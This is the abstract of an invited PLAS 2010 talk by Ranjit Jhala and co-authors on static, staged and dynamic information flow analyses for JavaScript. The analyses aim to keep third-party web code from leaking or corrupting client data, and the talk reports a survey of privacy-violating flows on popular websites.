PLAS 2010 1st Invited Talk

Static, Staged and Dynamic Flow Analyses for JavaScript

Ranjit Jhala
University of California, San Diego

(Joint work with Ravi Chugh, Jeff Meister, Don Jang, Sorin Lerner and Hovav Shacham)

ABSTRACT:
Information flow control can offer important security and privacy benefits
in the context of JavaScript based web applications that dynamically load 
third-party code which can steal or corrupt im- portant client information. 
These benefits have not yet been reaped due to the challenging nature of
analyzing JavaScript code. 

In this talk, we describe three approaches to analyzing JavaScript to
enforce flow control: a static analysis, which analyzes the entire program
source to overapproximate all possible run-time flows, a staged analysis,
that uses the partial results of a static analysis to emit residual 
checks that are dynamically performed as code gets loaded at run-time,
and a fully dynamic analysis that rewrites JavaScript in order to track
flows entirely at run-time.

We highlight some of the (many!) challenges that must be addressed 
in order to analyze real-world JavaScript. Finally, we describe results 
from an empirical investigation of various security and privacy violating
flows on a large number of popular websites.